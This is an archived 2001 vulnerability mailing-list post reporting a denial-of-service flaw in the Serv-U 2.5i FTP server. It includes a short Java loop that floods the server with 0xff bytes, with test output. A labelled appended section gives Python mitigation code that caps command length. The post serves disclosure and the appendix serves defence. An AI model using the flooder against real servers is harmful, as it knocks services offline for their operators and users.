Vulnerability Development mailing list archives

Serv-U 2.5i DoS


From: "Steven, Bates" <Craig () FREENET DE>
Date: Sun, 25 Feb 2001 07:55:29 -0700

Hi, I think I found another DoS issue in Serv-U 2.5i:

I downloaded the "Fixed" version of Serv-U yesterday. I installed it on one
of my PCs and started %windir%\RSRCMTR.EXE to see how many resources are used
when I flood it. Then I started to play around with the server:

Ftp> open server
Connected to server.
220 Serv-U FTP-Server v2.5i for WinSock ready...

I coded a little Java application which flooded the server with 0x00 chars,
but at least that bug was fixed.
So I tried other chars and found out that 0xff was a good choice. The
application just sends out 0xff chars in a never-ending loop (I added a
Counter to see how many chars are needed to block/crash it).

 char nuke=0xff;
 int Counter=0;

 while(true)
  {
   sout.print(nuke);
   Counter++;
   if(Counter%10000==0)
    System.out.println(Counter+" 0xff sent");
  }


I started it, and the resources got lower and lower. When about 290000 0xff
chars were sent, there was a popup (I am sure every Win9x user saw it once)
which said that 90% of the resources were already used, and that some programs
should be closed. I tried to click the "OK" button, but the popup did not
react. I also noticed that the mouse cursor was moving strangely... I tried to
log in from another PC:

Ftp>open Server
Connected to server.
Connection closed by remote host.

but as you can see, it did not work - the connection closed after the timeout.
Then I stopped the Java application with Ctrl-C, the resource icon became
green, the popup disappeared (it finally noticed that I had clicked on it)
and the server was working fine again.

While writing this, I was testing the flooder, but after seeing the popup on
the screen, I forgot to stop the flooder. When I finally noticed that, I
stopped it - it had already sent about 2.5 million 0xff chars to the server. I
tried to connect to the ftpd, but I couldn't - I was connected and
immediately(!) disconnected. I tested it again, but this only works sometimes,
I have no idea why.

I do not know why the server acts like this, but this issue really
should be fixed.

!! THE FLOODER DOES NOT WORK IF THE SERV-U ICON IS JUST IN THE TRAY, YOU NEED
TO SEE THE LOGGING SCREEN !!
!! I was only able to reproduce this behaviour on Win95, on Win98 it did not
seem to do anything !!


[Craig]
http://www.HaQuarter.De/
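
A server-side mitigation for the kind of flood described in the post, an endless stream of bytes with no line terminator on the FTP control connection, is to cap how many bytes a single command may occupy and drop the client once the cap is exceeded. The following is an added example, not code from the original post or from Serv-U; the class and function names and the 512-byte cap are assumptions, and the sample traffic is constructed.

```python
import itertools


class FloodDetected(Exception):
    """Raised when a client exceeds the per-command byte cap."""


class BoundedLineReader:
    """Splits control-channel bytes into CRLF-terminated commands while
    holding at most max_line unterminated bytes between calls."""

    def __init__(self, max_line=512):  # 512 is an assumed cap
        self.max_line = max_line
        self._pending = bytearray()

    def feed(self, chunk):
        self._pending += chunk
        lines = []
        while True:
            end = self._pending.find(b"\r\n")
            if end == -1:
                break
            if end > self.max_line:
                raise FloodDetected("command longer than cap")
            lines.append(bytes(self._pending[:end]))
            del self._pending[:end + 2]
        if len(self._pending) > self.max_line:
            raise FloodDetected("unterminated data exceeds cap")
        return lines


def handle_session(chunks, max_line=512):
    """Return (commands, bytes_accepted, dropped) for one client."""
    reader = BoundedLineReader(max_line)
    commands, accepted = [], 0
    for chunk in chunks:
        accepted += len(chunk)
        try:
            commands += reader.feed(chunk)
        except FloodDetected:
            return commands, accepted, True  # caller closes the socket here
    return commands, accepted, False


if __name__ == "__main__":
    # Constructed traffic: a normal login split across two reads, then a
    # stream of 0xff bytes that never contains a line terminator.
    print(handle_session([b"USER anonymous\r\nPA", b"SS guest\r\n"]))
    print(handle_session(itertools.repeat(b"\xff" * 1024, 300)))
```

With the cap in place the flooding client is cut off after its first read instead of after hundreds of thousands of bytes, and the normal session is unaffected.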

